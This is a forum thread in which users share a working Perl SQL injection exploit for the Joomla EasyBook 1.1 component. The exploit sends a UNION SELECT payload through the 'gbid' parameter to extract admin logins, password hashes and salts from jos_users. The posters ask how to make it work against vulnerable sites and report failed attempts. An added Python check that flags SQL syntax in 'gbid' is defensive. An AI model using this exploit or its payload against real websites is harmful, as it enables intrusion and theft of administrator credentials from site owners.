Government Security
Network Security Resources

Joomla Component EasyBook 1.1 SQL Injection Exploit (Question)



#1 Mux99

Posted 27 July 2008 - 10:48 AM

So this is an exploit for Joomla Component EasyBook 1.1, but I really don't know what this parameter is: "&md: 0f8ab366793a0d1da85c6f5a8d4fb576#"! Do you know where I can find this hash on vulnerable websites? And what do I need it for? I don't think it's a session ID or anything else... without that the whole exploit is useless...

Thx for helping me ;)

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:							 #
# Host: xxx.lu					 #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--													  --+-\n";
print "-+--			Author: ZAMUT							 --+-\n";
print "-+--			Vuln: gbid=							   --+-\n";
print "-+--			Homepage: http://antichat.ru			  --+-\n";
print "-+--			Dork: com_easybook						--+-\n\n";

print "Host:";
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
			   "Host: www.$host\n".
			   "Content-Type: application/x-www-form-urlencoded\n".
			   "Content-Length: 214\n\n".
			   "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
	 $s = <$socket>;
	 if($s=~/:::(.+):::/){
		   $lhs = $1;
		   ($l,$h,$s)=split(':',$lhs);
		   print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
		   close $socket; 
		   exit; }
  }
  die ("Exploit failed!");

# milw0rm.com [2008-06-04]
http://www.milw0rm.com/exploits/5740
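
Seen from the defending side, the request in the script above stands out because `gbid` should be a row id but carries SQL instead. The check below is an added example, not part of the original post or of EasyBook; the function name, the assumption that `gbid` and `Itemid` are plain integers, and both sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: these parameters are numeric row ids and nothing else.
INT_PARAMS = ("gbid", "Itemid")
# SQL fragments that have no place in an id field.
SQLI_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|/\*|--|\bconcat\s*\(|0x[0-9a-f]{2,}")

def check_easybook_request(body):
    """Return findings for one form-encoded POST body (empty list means clean)."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_easybook":
        return []  # not addressed to this component
    findings = []
    for name in INT_PARAMS:
        # Check every occurrence, so a repeated parameter cannot hide a bad value.
        for value in params.get(name, []):
            if not re.fullmatch(r"\d{1,10}", value):
                findings.append(f"{name} is not a plain integer: {value[:40]!r}")
            if SQLI_RE.search(value):
                findings.append(f"{name} contains SQL syntax")
    return findings

# Constructed sample bodies (md value is a placeholder, not a real token).
CLEAN = "option=com_easybook&Itemid=1&func=deleteentry&gbid=42&md=PLACEHOLDER"
SUSPICIOUS = ("option=com_easybook&Itemid=1&func=deleteentry"
              "&gbid=-1+union+select+1,2,3+from+jos_users/*&md=PLACEHOLDER")

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("suspicious", SUSPICIOUS)):
        print(label, check_easybook_request(body))
```

The same integer-only rule belongs in the component itself: casting `gbid` to an integer before it reaches the query removes the injection point, and the pattern match is only a logging aid.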

#2 alexbtp

Posted 08 May 2009 - 09:26 AM


Oh, thanks.
But I can't exploit.
Attack report:

Can't connecting! at file.pl line 25

or

Exploit failed!

I can't see &gbid



